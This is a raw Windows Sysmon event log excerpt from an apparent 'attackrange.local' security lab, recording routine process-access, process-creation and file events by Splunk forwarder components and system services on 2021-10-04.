07:47:33.145{2FDD8D40-AC9B-615A-2B00-00000000FD01}28602880C:\Windows\system32\conhost.exe{2FDD8D40-B195-615A-2F01-00000000FD01}1220C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080828Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:47:33.145{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080827Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:47:33.145{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080826Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:47:33.145{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080825Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:47:33.145{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080824Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:47:33.145{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080823Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:47:33.145{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080822Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:47:33.145{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080821Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:47:33.145{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080820Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:47:33.145{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080819Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:47:33.145{2FDD8D40-AC98-615A-0500-00000000FD01}412528C:\Windows\system32\csrss.exe{2FDD8D40-B195-615A-2F01-00000000FD01}1220C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000080818Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:47:33.145{2FDD8D40-AC9A-615A-1E00-00000000FD01}19483540C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{2FDD8D40-B195-615A-2F01-00000000FD01}1220C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000080817Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:47:33.146{2FDD8D40-B195-615A-2F01-00000000FD01}1220C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{2FDD8D40-AC99-615A-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{2FDD8D40-AC9A-615A-1E00-00000000FD01}1948C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000080846Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:47:34.926{2FDD8D40-B196-615A-3001-00000000FD01}840948C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{2FDD8D40-AC9A-615A-1E00-00000000FD01}1948C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000080845Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:47:34.817{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0B5F19B09925EC6118F448DBB1D05B3A,SHA256=E2FA92D7B4D7E3D547F01945CC3A420B4BBBA3C9A38268D901FCA6105FBA8A0F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000102952Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:47:34.249{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=284AAB640218FF69F8A0B868BBDDAE2C,SHA256=C6F1AB04CD6A7D107E9DA0B1A6BBB7C13001AE6B6950A6316A36C347C155C514,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000080844Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:47:34.739{2FDD8D40-AC9B-615A-2B00-00000000FD01}28602880C:\Windows\system32\conhost.exe{2FDD8D40-B196-615A-3001-00000000FD01}840C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080843Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:47:34.739{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080842Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:47:34.739{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080841Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:47:34.739{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080840Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:47:34.739{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080839Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:47:34.739{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080838Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:47:34.739{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080837Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:47:34.739{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080836Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:47:34.739{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080835Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:47:34.739{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080834Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:47:34.739{2FDD8D40-AC98-615A-0500-00000000FD01}4121436C:\Windows\system32\csrss.exe{2FDD8D40-B196-615A-3001-00000000FD01}840C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000080833Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:47:34.739{2FDD8D40-AC9A-615A-1E00-00000000FD01}19483540C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{2FDD8D40-B196-615A-3001-00000000FD01}840C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program 